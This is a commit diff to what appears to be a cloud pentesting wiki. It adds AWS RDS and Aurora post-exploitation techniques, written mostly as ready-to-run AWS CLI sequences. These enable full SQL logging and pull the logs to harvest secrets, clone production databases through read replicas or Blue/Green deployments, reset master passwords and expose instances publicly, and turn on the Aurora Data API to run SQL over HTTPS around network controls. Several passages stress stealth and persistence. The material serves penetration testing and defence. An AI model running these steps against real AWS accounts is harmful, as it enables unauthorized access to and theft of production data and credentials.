AWS RDS post-exploitation: Out-of-band SQL via Data API + master password reset (Aurora)

carlospolop · carlospolop · commit 95302db34c4b · 2025-10-07T14:04:48.000+02:00
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
@@ -529,7 +529,7 @@ Abusing DynamoDB Kinesis streaming destinations to continuously exfiltrate chang
 Minimum permissions (attacker):
 - `dynamodb:EnableKinesisStreamingDestination` on the target table
 - Optionally `dynamodb:DescribeKinesisStreamingDestination`/`dynamodb:DescribeTable` to monitor status
-- Read permissions on the attacker-owned Kinesis stream to consume records: `kinesis:ListShards`, `kinesis:GetShardIterator`, `kinesis:GetRecords`
+- Read permissions on the attacker-owned Kinesis stream to consume records: `kinesis:*`
 
 <details>
 <summary>PoC (us-east-1)</summary>
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
@@ -69,7 +69,7 @@ aws-lambda-function-url-public-exposure.md
 Abuse `UpdateEventSourceMapping` to change the target Lambda function of an existing Event Source Mapping (ESM) so that records from DynamoDB Streams, Kinesis, or SQS are delivered to an attacker-controlled function. This silently diverts live data without touching producers or the original function code.
 
 {{#ref}}
-aws-lambda-event-source-mapping-target-hijack.md
+aws-lambda-event-source-mapping-hijack.md
 {{#endref}}
 
 ### AWS Lambda – EFS Mount Injection data exfiltration
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md
@@ -175,3 +175,283 @@ aws rds stop-db-instance-automated-backups-replication \
 
 
 {{#include ../../../banners/hacktricks-training.md}}
+
+### Enable full SQL logging via DB parameter groups and exfiltrate via RDS log APIs
+
+Abuse `rds:ModifyDBParameterGroup` with RDS log download APIs to capture all SQL statements executed by applications (no DB engine credentials needed). Enable engine SQL logging and pull the file logs via `rds:DescribeDBLogFiles` and `rds:DownloadDBLogFilePortion` (or the REST `downloadCompleteLogFile`). Useful to collect queries that may contain secrets/PII/JWTs.
+
+Permissions needed (minimum):
+- `rds:DescribeDBInstances`, `rds:DescribeDBLogFiles`, `rds:DownloadDBLogFilePortion`
+- `rds:CreateDBParameterGroup`, `rds:ModifyDBParameterGroup`
+- `rds:ModifyDBInstance` (only to attach a custom parameter group if the instance is using the default one)
+- `rds:RebootDBInstance` (for parameters requiring reboot, e.g., PostgreSQL)
+
+Steps
+1) Recon target and current parameter group
+```bash
+aws rds describe-db-instances \
+  --query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBParameterGroups[0].DBParameterGroupName]' \
+  --output table
+```
+
+2) Ensure a custom DB parameter group is attached (cannot edit the default)
+- If the instance already uses a custom group, reuse its name in the next step.
+- Otherwise create and attach one matching the engine family:
+```bash
+# Example for PostgreSQL 16
+aws rds create-db-parameter-group \
+  --db-parameter-group-name ht-logs-pg \
+  --db-parameter-group-family postgres16 \
+  --description "HT logging"
+
+aws rds modify-db-instance \
+  --db-instance-identifier <DB> \
+  --db-parameter-group-name ht-logs-pg \
+  --apply-immediately
+# Wait until status becomes "available"
+```
+
+3) Enable verbose SQL logging
+- MySQL engines (immediate / no reboot):
+```bash
+aws rds modify-db-parameter-group \
+  --db-parameter-group-name <PGNAME> \
+  --parameters \
+  "ParameterName=general_log,ParameterValue=1,ApplyMethod=immediate" \
+  "ParameterName=log_output,ParameterValue=FILE,ApplyMethod=immediate"
+# Optional extras:
+#   "ParameterName=slow_query_log,ParameterValue=1,ApplyMethod=immediate" \
+#   "ParameterName=long_query_time,ParameterValue=0,ApplyMethod=immediate"
+```
+
+- PostgreSQL engines (reboot required):
+```bash
+aws rds modify-db-parameter-group \
+  --db-parameter-group-name <PGNAME> \
+  --parameters \
+  "ParameterName=log_statement,ParameterValue=all,ApplyMethod=pending-reboot"
+# Optional to log duration for every statement:
+#   "ParameterName=log_min_duration_statement,ParameterValue=0,ApplyMethod=pending-reboot"
+
+# Reboot if any parameter is pending-reboot
+aws rds reboot-db-instance --db-instance-identifier <DB>
+```
+
+4) Let the workload run (or generate queries). Statements will be written to engine file logs
+- MySQL: `general/mysql-general.log`
+- PostgreSQL: `postgresql.log`
+
+5) Discover and download logs (no DB creds required)
+```bash
+aws rds describe-db-log-files --db-instance-identifier <DB>
+
+# Pull full file via portions (iterate until AdditionalDataPending=false). For small logs a single call is enough:
+aws rds download-db-log-file-portion \
+  --db-instance-identifier <DB> \
+  --log-file-name general/mysql-general.log \
+  --starting-token 0 \
+  --output text > dump.log
+```
+
+6) Analyze offline for sensitive data
+```bash
+grep -Ei "password=|aws_access_key_id|secret|authorization:|bearer" dump.log | sed 's/\(aws_access_key_id=\)[A-Z0-9]*/\1AKIA.../; s/\(secret=\).*/\1REDACTED/; s/\(Bearer \).*/\1REDACTED/' | head
+```
+
+Example evidence (redacted):
+```text
+2025-10-06T..Z    13 Query  INSERT INTO t(note) VALUES ('user=alice password=Sup3rS3cret!')
+2025-10-06T..Z    13 Query  INSERT INTO t(note) VALUES ('authorization: Bearer REDACTED')
+2025-10-06T..Z    13 Query  INSERT INTO t(note) VALUES ('aws_access_key_id=AKIA... secret=REDACTED')
+```
+
+Cleanup
+- Revert parameters to defaults and reboot if required:
+```bash
+# MySQL
+aws rds modify-db-parameter-group \
+  --db-parameter-group-name <PGNAME> \
+  --parameters \
+  "ParameterName=general_log,ParameterValue=0,ApplyMethod=immediate"
+
+# PostgreSQL
+aws rds modify-db-parameter-group \
+  --db-parameter-group-name <PGNAME> \
+  --parameters \
+  "ParameterName=log_statement,ParameterValue=none,ApplyMethod=pending-reboot"
+# Reboot if pending-reboot
+```
+
+Impact: Post-exploitation data access by capturing all application SQL statements via AWS APIs (no DB creds), potentially leaking secrets, JWTs, and PII.
+
+### `rds:CreateDBInstanceReadReplica`, `rds:ModifyDBInstance`
+
+Abuse RDS read replicas to gain out-of-band read access without touching the primary instance credentials. An attacker can create a read replica from a production instance, reset the replica's master password (this does not change the primary), and optionally expose the replica publicly to exfiltrate data.
+
+Permissions needed (minimum):
+- `rds:DescribeDBInstances`
+- `rds:CreateDBInstanceReadReplica`
+- `rds:ModifyDBInstance`
+- `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress` (if exposing publicly)
+
+Impact: Read-only access to production data via a replica with attacker-controlled credentials; lower detection likelihood as the primary remains untouched and replication continues.
+
+```bash
+# 1) Recon: find non-Aurora sources with backups enabled
+aws rds describe-db-instances \
+  --query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBInstanceArn,DBSubnetGroup.DBSubnetGroupName,VpcSecurityGroups[0].VpcSecurityGroupId,PubliclyAccessible]' \
+  --output table
+
+# 2) Create a permissive SG (replace <VPC_ID> and <YOUR_IP/32>)
+aws ec2 create-security-group --group-name rds-repl-exfil --description 'RDS replica exfil' --vpc-id <VPC_ID> --query GroupId --output text
+aws ec2 authorize-security-group-ingress --group-id <SGID> --ip-permissions '[{"IpProtocol":"tcp","FromPort":3306,"ToPort":3306,"IpRanges":[{"CidrIp":"<YOUR_IP/32>","Description":"tester"}]}]'
+
+# 3) Create the read replica (optionally public)
+aws rds create-db-instance-read-replica \
+  --db-instance-identifier <REPL_ID> \
+  --source-db-instance-identifier <SOURCE_DB> \
+  --db-instance-class db.t3.medium \
+  --publicly-accessible \
+  --vpc-security-group-ids <SGID>
+aws rds wait db-instance-available --db-instance-identifier <REPL_ID>
+
+# 4) Reset ONLY the replica master password (primary unchanged)
+aws rds modify-db-instance --db-instance-identifier <REPL_ID> --master-user-password 'NewStr0ng!Passw0rd' --apply-immediately
+aws rds wait db-instance-available --db-instance-identifier <REPL_ID>
+
+# 5) Connect and dump (use the SOURCE master username + NEW password)
+REPL_ENDPOINT=$(aws rds describe-db-instances --db-instance-identifier <REPL_ID> --query 'DBInstances[0].Endpoint.Address' --output text)
+# e.g., with mysql client:  mysql -h "$REPL_ENDPOINT" -u <MASTER_USERNAME> -p'NewStr0ng!Passw0rd' -e 'SHOW DATABASES; SELECT @@read_only, CURRENT_USER();'
+
+# Optional: promote for persistence
+# aws rds promote-read-replica --db-instance-identifier <REPL_ID>
+```
+
+Example evidence (MySQL):
+- Replica DB status: `available`, read replication: `replicating`
+- Successful connection with new password and `@@read_only=1` confirming read-only replica access.
+
+### `rds:CreateBlueGreenDeployment`, `rds:ModifyDBInstance`
+
+Abuse RDS Blue/Green to clone a production DB into a continuously replicated, read‑only green environment. Then reset the green master credentials to access the data without touching the blue (prod) instance. This is stealthier than snapshot sharing and often bypasses monitoring focused only on the source.
+
+```bash
+# 1) Recon – find eligible source (non‑Aurora MySQL/PostgreSQL in the same account)
+aws rds describe-db-instances \
+  --query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,EngineVersion,DBSubnetGroup.DBSubnetGroupName,PubliclyAccessible]'
+
+# Ensure: automated backups enabled on source (BackupRetentionPeriod > 0), no RDS Proxy, supported engine/version
+
+# 2) Create Blue/Green deployment (replicates blue->green continuously)
+aws rds create-blue-green-deployment \
+  --blue-green-deployment-name ht-bgd-attack \
+  --source <BLUE_DB_ARN> \
+  # Optional to upgrade: --target-engine-version <same-or-higher-compatible>
+
+# Wait until deployment Status becomes AVAILABLE, then note the green DB id
+aws rds describe-blue-green-deployments \
+  --blue-green-deployment-identifier <BGD_ID> \
+  --query 'BlueGreenDeployments[0].SwitchoverDetails[0].TargetMember'
+
+# Typical green id: <blue>-green-XXXX
+
+# 3) Reset the green master password (does not affect blue)
+aws rds modify-db-instance \
+  --db-instance-identifier <GREEN_DB_ID> \
+  --master-user-password 'Gr33n!Exfil#1' \
+  --apply-immediately
+
+# Optional: expose the green for direct access (attach an SG that allows the DB port)
+aws rds modify-db-instance \
+  --db-instance-identifier <GREEN_DB_ID> \
+  --publicly-accessible \
+  --vpc-security-group-ids <SG_ALLOWING_DB_PORT> \
+  --apply-immediately
+
+# 4) Connect to the green endpoint and query/exfiltrate (green is read‑only)
+aws rds describe-db-instances \
+  --db-instance-identifier <GREEN_DB_ID> \
+  --query 'DBInstances[0].Endpoint.Address' --output text
+
+# Then connect with the master username and the new password and run SELECT/dumps
+# e.g. MySQL: mysql -h <endpoint> -u <master_user> -p'Gr33n!Exfil#1'
+
+# 5) Cleanup – remove blue/green and the green resources
+aws rds delete-blue-green-deployment \
+  --blue-green-deployment-identifier <BGD_ID> \
+  --delete-target true
+```
+
+Impact: Read-only but full data access to a near-real-time clone of production without modifying the production instance. Useful for stealthy data extraction and offline analysis.
+
+
+### Out-of-band SQL via RDS Data API by enabling HTTP endpoint + resetting master password
+
+Abuse Aurora to enable the RDS Data API HTTP endpoint on a target cluster, reset the master password to a value you control, and run SQL over HTTPS (no VPC network path required). Works on Aurora engines that support the Data API/EnableHttpEndpoint (e.g., Aurora MySQL 8.0 provisioned; some Aurora PostgreSQL/MySQL versions).
+
+Permissions (minimum):
+- rds:DescribeDBClusters, rds:ModifyDBCluster (or rds:EnableHttpEndpoint)
+- secretsmanager:CreateSecret
+- rds-data:ExecuteStatement (and rds-data:BatchExecuteStatement if used)
+
+Impact: Bypass network segmentation and exfiltrate data via AWS APIs without direct VPC connectivity to the DB.
+
+<details>
+<summary>End-to-end CLI (Aurora MySQL example)</summary>
+
+```bash
+# 1) Identify target cluster ARN
+REGION=us-east-1
+CLUSTER_ID=<target-cluster-id>
+CLUSTER_ARN=$(aws rds describe-db-clusters --region $REGION \
+  --db-cluster-identifier $CLUSTER_ID \
+  --query 'DBClusters[0].DBClusterArn' --output text)
+
+# 2) Enable Data API HTTP endpoint on the cluster
+# Either of the following (depending on API/engine support):
+aws rds enable-http-endpoint --region $REGION --resource-arn "$CLUSTER_ARN"
+# or
+aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
+  --enable-http-endpoint --apply-immediately
+
+# Wait until HttpEndpointEnabled is True
+aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
+aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID \
+  --query 'DBClusters[0].HttpEndpointEnabled' --output text
+
+# 3) Reset master password to attacker-controlled value
+aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
+  --master-user-password 'Sup3rStr0ng!1' --apply-immediately
+# Wait until pending password change is applied
+while :; do
+  aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
+  P=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID \
+     --query 'DBClusters[0].PendingModifiedValues.MasterUserPassword' --output text)
+  [[ "$P" == "None" || "$P" == "null" ]] && break
+  sleep 10
+done
+
+# 4) Create a Secrets Manager secret for Data API auth
+SECRET_ARN=$(aws secretsmanager create-secret --region $REGION --name rdsdata/demo-$CLUSTER_ID \
+  --secret-string '{"username":"admin","password":"Sup3rStr0ng!1"}' \
+  --query ARN --output text)
+
+# 5) Prove out-of-band SQL via HTTPS using rds-data
+# (Example with Aurora MySQL; for PostgreSQL, adjust SQL and username accordingly)
+aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
+  --secret-arn "$SECRET_ARN" --database mysql --sql "create database if not exists demo;"
+aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
+  --secret-arn "$SECRET_ARN" --database demo --sql "create table if not exists pii(note text);"
+aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
+  --secret-arn "$SECRET_ARN" --database demo --sql "insert into pii(note) values ('token=SECRET_JWT');"
+aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
+  --secret-arn "$SECRET_ARN" --database demo --sql "select current_user(), now(), (select count(*) from pii) as row_count;" \
+  --format-records-as JSON
+```
+
+</details>
+
+Notes:
+- If multi-statement SQL is rejected by rds-data, issue separate execute-statement calls.
+- For engines where modify-db-cluster --enable-http-endpoint has no effect, use rds enable-http-endpoint --resource-arn.
+- Ensure the engine/version actually supports the Data API; otherwise HttpEndpointEnabled will remain False.
